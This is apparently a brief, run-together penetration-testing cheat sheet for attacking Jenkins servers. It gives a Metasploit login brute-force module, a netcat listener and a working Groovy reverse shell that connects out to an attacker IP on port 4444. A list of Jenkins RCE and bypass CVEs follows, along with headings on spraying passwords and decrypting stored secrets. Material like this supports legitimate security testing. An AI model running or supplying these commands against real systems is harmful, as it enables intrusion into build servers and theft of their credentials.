Jenkins
Brute Force Credentials
msfconsole
msf > use auxiliary/scanner/http/jenkins_loginReverse Shell on Dashboard
nc -lvnp 4444r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/<Attacker_IP>/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Jenkins
Common bugs
Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
CheckScript RCE in Jenkins (CVE-2019-1003029, CVE-2019-1003030)
Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
Dumping builds to find cleartext secrets
Password spraying
Files to copy after compromising
Decrypt Jenkins secrets offline
Groovy Scripts
Decrypt Jenkins secrets from Groovy
Command execution from Groovy
Reverse shell from Groovy
Last updated